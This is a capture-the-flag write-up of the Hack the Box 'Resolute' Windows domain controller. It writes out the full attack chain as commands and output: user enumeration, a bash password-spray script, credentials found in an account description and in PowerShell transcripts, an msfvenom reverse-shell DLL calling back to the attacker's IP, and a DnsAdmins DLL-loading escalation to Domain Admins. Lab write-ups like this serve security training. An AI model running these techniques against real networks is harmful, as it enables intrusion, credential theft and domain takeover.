Hack the Box retired Resolute this week. This machine is rated medium and was released in December 2019.
Root looks to be much more difficult than user on this one. Let’s see what we can find.
Reconnaissance
To start things off I start a NMAP scan running default scripts, version detection, saving outputs, maxing the verbosity, and scanning all TCP ports.
kali@kali:~$ nmap -sC -sV -oA simple -vvv -p- 10.10.10.169 Nmap scan report for resolute.megabank.local (10.10.10.169) Host is up, received conn-refused (0.062s latency). Scanned at 2020-05-29 13:42:07 EDT for 5739s Not shown: 65509 closed ports Reason: 65509 conn-refused PORT STATE SERVICE REASON VERSION 53/tcp open domain? syn-ack | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-05-29 19:25:37Z) 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? syn-ack 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf syn-ack .NET Message Framing 47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc syn-ack Microsoft Windows RPC 49665/tcp open msrpc syn-ack Microsoft Windows RPC 49666/tcp open msrpc syn-ack Microsoft Windows RPC 49667/tcp open msrpc syn-ack Microsoft Windows RPC 49670/tcp open msrpc syn-ack Microsoft Windows RPC 49676/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc syn-ack Microsoft Windows RPC 49688/tcp open msrpc syn-ack Microsoft Windows RPC 49709/tcp open msrpc syn-ack Microsoft Windows RPC 50537/tcp open tcpwrapped syn-ack 51117/tcp open tcpwrapped syn-ack 52808/tcp open tcpwrapped syn-ack 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED15F27%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h30m55s, deviation: 4h02m30s, median: 10m54s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 41231/tcp): CLEAN (Couldn't connect) | Check 2 (port 52471/tcp): CLEAN (Couldn't connect) | Check 3 (port 55070/udp): CLEAN (Failed to receive data) | Check 4 (port 26625/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2020-05-29T12:26:29-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-29T19:26:31 |_ start_date: 2020-05-29T17:42:56
Definitely looks like a Windows DC here. I personally start looking at SMB if 445 is open on Windows boxes. Let’s enumerate a bit more with “enumdomusers”.
kali@kali:~$ rpcclient -U "" -N 10.10.10.169 rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[ryan] rid:[0x451] user:[marko] rid:[0x457] user:[sunita] rid:[0x19c9] user:[abigail] rid:[0x19ca] user:[marcus] rid:[0x19cb] user:[sally] rid:[0x19cc] user:[fred] rid:[0x19cd] user:[angela] rid:[0x19ce] user:[felicia] rid:[0x19cf] user:[gustavo] rid:[0x19d0] user:[ulf] rid:[0x19d1] user:[stevie] rid:[0x19d2] user:[claire] rid:[0x19d3] user:[paulo] rid:[0x19d4] user:[steve] rid:[0x19d5] user:[annette] rid:[0x19d6] user:[annika] rid:[0x19d7] user:[per] rid:[0x19d8] user:[claude] rid:[0x19d9] user:[melanie] rid:[0x2775] user:[zach] rid:[0x2776] user:[simon] rid:[0x2777] user:[naoki] rid:[0x2778] rpcclient $>
Here we have a list of all the domain users. Since there are so few users we can just “queryuser” from the rpcclient console to see what we can find.
rpcclient $> queryuser marko
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
Logon Time : Wed, 31 Dec 1969 19:00:00 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT
Password last set Time : Fri, 27 Sep 2019 09:17:15 EDT
Password can change Time : Sat, 28 Sep 2019 09:17:15 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x457
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
Here we see an interesting description for Mr. Novak.
Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
kali@kali:~$ rpcclient -U "marko%Welcom123!" -c "getusername;quit" 10.10.10.169 Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
No luck logging in with Marko.
Weaponization and Delivery
I wrote up a quick bash script to password spray the users we know exist with the password we found in the description for Marko.
kali@kali:~/tools$ mkdir passspray kali@kali:~/tools$ cd passspray/ kali@kali:~/tools/passspray$ sudo vi passsprayv2.sh
while read u; do
echo -n "$u" && rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169
done <users.txtThis script simply looks at the list of users in users.txt, stores each line in variable of “u”. Next, for each user in user.txt the following command runs “rpcclient -U “$u <- gets replaced with each line in user.txt, followed by the possible password. Last get username will let us know if a user authentication succeeds, quits the rpcclient command and lists the target “10.10.10.169”.
kali@kali:~/tools/passspray$ ./passsprayv2.sh AdministratorCannot connect to server. Error was NT_STATUS_LOGON_FAILURE GuestCannot connect to server. Error was NT_STATUS_LOGON_FAILURE krbtgtCannot connect to server. Error was NT_STATUS_LOGON_FAILURE DefaultAccountCannot connect to server. Error was NT_STATUS_LOGON_FAILURE ryanCannot connect to server. Error was NT_STATUS_LOGON_FAILURE markoCannot connect to server. Error was NT_STATUS_LOGON_FAILURE sunitaCannot connect to server. Error was NT_STATUS_LOGON_FAILURE abigailCannot connect to server. Error was NT_STATUS_LOGON_FAILURE marcusCannot connect to server. Error was NT_STATUS_LOGON_FAILURE sallyCannot connect to server. Error was NT_STATUS_LOGON_FAILURE fredCannot connect to server. Error was NT_STATUS_LOGON_FAILURE angelaCannot connect to server. Error was NT_STATUS_LOGON_FAILURE feliciaCannot connect to server. Error was NT_STATUS_LOGON_FAILURE gustavoCannot connect to server. Error was NT_STATUS_LOGON_FAILURE ulfCannot connect to server. Error was NT_STATUS_LOGON_FAILURE stevieCannot connect to server. Error was NT_STATUS_LOGON_FAILURE claireCannot connect to server. Error was NT_STATUS_LOGON_FAILURE pauloCannot connect to server. Error was NT_STATUS_LOGON_FAILURE steveCannot connect to server. Error was NT_STATUS_LOGON_FAILURE annetteCannot connect to server. Error was NT_STATUS_LOGON_FAILURE annikaCannot connect to server. Error was NT_STATUS_LOGON_FAILURE perCannot connect to server. Error was NT_STATUS_LOGON_FAILURE claudeCannot connect to server. Error was NT_STATUS_LOGON_FAILURE melanieAccount Name: melanie, Authority Name: MEGABANK zachCannot connect to server. Error was NT_STATUS_LOGON_FAILURE simonCannot connect to server. Error was NT_STATUS_LOGON_FAILURE naokiCannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Success! We have a hit on user Melanie.
kali@kali:~/tools/passspray$ smbclient -U "melanie%Welcome123!" \\\\10.10.10.169\\SYSVOL
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 25 09:28:21 2019
.. D 0 Wed Sep 25 09:28:21 2019
megabank.local D 0 Wed Sep 25 09:28:21 2019
10340607 blocks of size 4096. 7565420 blocks available
smb: \> cd megabank.local\
smb: \megabank.local\> ls
. D 0 Wed Sep 25 09:34:36 2019
.. D 0 Wed Sep 25 09:34:36 2019
DfsrPrivate DHS 0 Wed Sep 25 09:34:36 2019
Policies D 0 Wed Sep 25 09:28:32 2019
scripts D 0 Wed Sep 25 09:28:21 2019
10340607 blocks of size 4096. 7565164 blocks available
smb: \megabank.local\>Nothing interesting looking through the shares. Let’s take a step back and look more into this user. Kali comes with many great AD enumeration tools. Let’s try ldapdomaindump.
kali@kali:~/htb/resolute/domainenum$ ldapdomaindump -u "MEGABANK\melanie" -p "Welcome123!" 10.10.10.169 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished kali@kali:~/htb/resolute/domainenum$ ls domain_computers_by_os.html domain_computers.html domain_groups.grep domain_groups.json domain_policy.html domain_trusts.grep domain_trusts.json domain_users.grep domain_users.json domain_computers.grep domain_computers.json domain_groups.html domain_policy.grep domain_policy.json domain_trusts.html domain_users_by_group.html domain_users.html
kali@kali:~/htb/resolute/domainenum$ cat domain_users.grep cn name sAMAccountName memberOf primaryGroupId whenCreated whenChanged lastLogon userAccountControl pwdLastSet objectSid description Naoki Yamamoto Naoki Yamamoto naoki Domain Users 12/04/19 10:40:44 12/04/19 10:40:44 01/01/01 00:00:00 NORMAL_ACCOUNT 12/04/19 10:40:44 S-1-5-21-1392959593-3013219662-3596683436-10104 Simon Faraday Simon Faraday simon Domain Users 12/04/19 10:39:58 12/04/19 10:39:58 01/01/01 00:00:00 NORMAL_ACCOUNT 12/04/19 10:39:58 S-1-5-21-1392959593-3013219662-3596683436-10103 Zach Armstrong Zach Armstrong zach Domain Users 12/04/19 10:39:27 12/04/19 10:39:27 01/01/01 00:00:00 NORMAL_ACCOUNT 12/04/19 10:39:27 S-1-5-21-1392959593-3013219662-3596683436-10102 Melanie Purkis Melanie Purkis melanie Remote Management Users Domain Users 12/04/19 10:38:45 05/29/20 20:35:04 01/01/01 00:00:00 NORMAL_ACCOUNT 05/29/20 20:35:04 S-1-5-21-1392959593-3013219662-3596683436-10101
Melanie is a member of the “Remote Management” group. Let’s see what that group has permissions to do.
kali@kali:~/htb/resolute/domainenum$ cat domain_groups.grep | grep "Remote Management" Contractors Contractors DnsAdmins, Remote Management Users Contractors 09/26/19 12:37:45 09/27/19 14:02:21 S-1-5-21-1392959593-3013219662-3596683436-1103 Remote Management Users Remote Management Users Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. 09/25/19 13:28:31 12/04/19 10:42:51 S-1-5-32-580
Ahh, winrm should be available for Melanie.
Foothold
Evil-winrm is basically the go to windows remote management tool for linux.
kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> whoami megabank\melanie
Finally got a foothold!
Evil-WinRM* PS C:\Users\melanie\Desktop> dir
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3b...8540After manually spot checking the filesystem, I found a unique directory called “PSTranscripts”
*Evil-WinRM* PS C:\> ls -hidden
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/29/2020 10:42 AM 402653184 pagefile.sys*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OjuoBGhU.20191203063201.txt ********************** Command start time: 20191203063455 ********************** PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> " PS megabank\ryan@RESOLUTE Documents> ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
A snippet of code from the .txt file shows a command for ryan to connect to a backups drive and the password is listed in clear text “Serv3r4Admin4cc123!“
Privilege Escalation
Ryan is in the Contractors group, which is in the DNSAdmins group
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192
I first tried to upload a reverse shell dll, but I assume the file was being detected as malicious and getting deleted.
kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp -a x64 LHOST=10.10.14.44 LPORT=7788 -f dll > trenchesofit.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 5120 bytes
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri "http://10.10.14.44/trenchesofit.dll" -OutFile "C:\Users\ryan\Documents\trenchesofit.dll"
*Evil-WinRM* PS C:\Users\ryan\Documents> dir
Directory: C:\Users\ryan\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2020 6:09 PM 5120 trenchesofit.dllWhen trying to move the file to the system, Windows Defender was discovering and removing the file. I have to change my approach. After some research I decided to recreate the msfvenom dll attempting to add the user to the Domain Admins group.
kali@kali:~/tools/impacket/examples$ msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' --platform windows -f dll > /home/kali/htb/resolute/trenchesofit.dll [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 311 bytes Final size of dll file: 5120 bytes
So I started up a SMB server to allow the command to access the needed payload to bypass Windows Defender.
kali@kali:~/tools/impacket/examples$ sudo python smbserver.py trenchesofitshare /home/kali/htb/resolute Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.44\trenchesofitshare\trenchesofit.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
[SC] StartService FAILED 1056:
An instance of the service is already running.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2976
FLAGS :
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.The first time I attempted to use ryan as the target for “net group” config, but I could not get this one to work. I tried Melanie and that worked. After running the DNS config command I connected back to the box with evil-winrm as melanie.
kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> whoami /all USER INFORMATION ---------------- User Name SID ================ =============================================== megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101 GROUP INFORMATION ----------------- Group Name Type SID Attributes =============================================== ================ ============================================= =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Domain Admins Group S-1-5-21-1392959593-3013219662-3596683436-512 Mandatory group, Enabled by default, Enabled group MEGABANK\Denied RODC Password Replication Group Alias S-1-5-21-1392959593-3013219662-3596683436-572 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled.
With “whoami /all” you can now see that Melanie is domain admin!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:32 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e1d9....619cJust grab the root flag in the normal location.
Overall, this was a fun box with a challenging privilege escalation method. I found a great resource for using “dnscmd” found here.
If you enjoyed this write-up, please show your respect here: https://www.hackthebox.eu/home/users/profile/272340
Feel free to comment or reach out if you have any questions or issues with any of the above steps. Until next time, stay safe in the Trenches of IT!